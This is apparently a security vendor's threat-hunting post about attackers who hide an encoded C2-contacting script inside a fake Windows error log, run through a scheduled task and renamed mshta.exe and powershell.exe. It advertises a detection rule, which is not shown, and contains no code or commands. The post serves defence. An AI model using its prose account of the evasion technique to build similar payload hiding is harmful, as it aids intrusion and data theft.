Threat Hunting Content: Malicious Payload in Fake Windows Error Logs

Last week, security researchers discovered a curious way to hide the malicious payload in plain sight, and this method is actively used in the wild. Adversaries use fake error logs to store ASCII characters disguised as hexadecimal values that decode to a malicious payload designed to prepare the ground for script-based attacks.

In the discovered scenario, cybercriminals applied a new method after they compromised systems and achieved persistence. Then they used a file with a .chk extension that imitated a Windows error log for an application. At first glimpse, the file is not suspicious, since it has timestamps and includes references to the internal version number for Windows, but at the end of each line is a decimal representation of ASCII character. Such a file will not cause suspicion of security solutions, and the user will consider it legitimate, in fact, this fake error log hides an encoded script that contacts the command and control server for the next step in the attack. The script is run using a scheduled task and two renamed legitimate windows binaries: mshta.exe and powershell.exe. Attackers use the script to collect details about installed browsers, security products, and point-of-sale software. Exclusive threat hunting rule developed by Osman Demir helps security solutions to find fake windows error logs containing malicious payloads:

The rule has translations for the following platforms:

SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, ELK Stack, RSA NetWitness, Sumo Logic, Graylog, Humio, LogPoint

EDR: Carbon Black, Elastic Endpoint


Tactics: Defense Evasion

Techniques: Masquerading (T1036)